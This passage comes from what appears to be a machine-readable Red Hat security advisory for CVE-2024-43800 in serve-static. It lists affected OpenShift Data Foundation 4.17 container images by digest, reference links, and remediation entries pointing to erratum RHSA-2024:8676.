"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
